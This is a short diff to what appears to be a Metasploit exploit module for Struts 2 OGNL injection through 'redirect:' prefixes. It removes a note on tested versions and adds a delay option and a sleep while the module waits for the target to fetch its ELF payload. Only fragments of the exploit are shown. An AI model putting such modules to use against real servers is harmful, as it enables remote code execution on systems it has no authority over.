@@ -26,9 +26,6 @@ def initialize(info = {})
26
26
"redirectAction:" is not properly sanitized. Since said information will be
27
27
evaluated as OGNL expression against the value stack, this introduces the
28
28
possibility to inject server side code.
29
-
30
- This module has been tested successfully on Struts 2.3.15 and Struts 2.0.11.2 over
31
- Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.
32
29
} ,
33
30
'License' => MSF_LICENSE ,
34
31
'Author' =>
@@ -74,6 +71,7 @@ def initialize(info = {})
74
71
Opt ::RPORT ( 8080 ) ,
75
72
OptString . new ( 'TARGETURI' , [ true , 'Action URI' , '/struts2-blank/example/HelloWorld.action' ] ) ,
76
73
OptInt . new ( 'HTTP_DELAY' , [ true , 'Time that the HTTP Server will wait for the payload request' , 60 ] ) ,
74
+ OptInt . new ( 'PAYLOAD_REQUEST_DELAY' , [ true , 'Time to wait for the payload request' , 5 ] ) ,
77
75
# It isn't OptPath becuase it's a *remote* path
78
76
OptString . new ( "WritableDir" , [ true , "A directory where we can write files (only on Linux targets)" , "/tmp" ] )
79
77
] , self . class )
@@ -359,6 +357,8 @@ def wait_payload
359
357
fail_with ( Failure ::Unknown , "#{ rhost } :#{ rport } - Target didn't request request the ELF payload -- Maybe it cant connect back to us?" )
360
358
end
361
359
end
360
+
361
+ sleep ( datastore [ 'PAYLOAD_REQUEST_DELAY' ] )
362
362
end
363
363
364
364
def build_hta
0 commit comments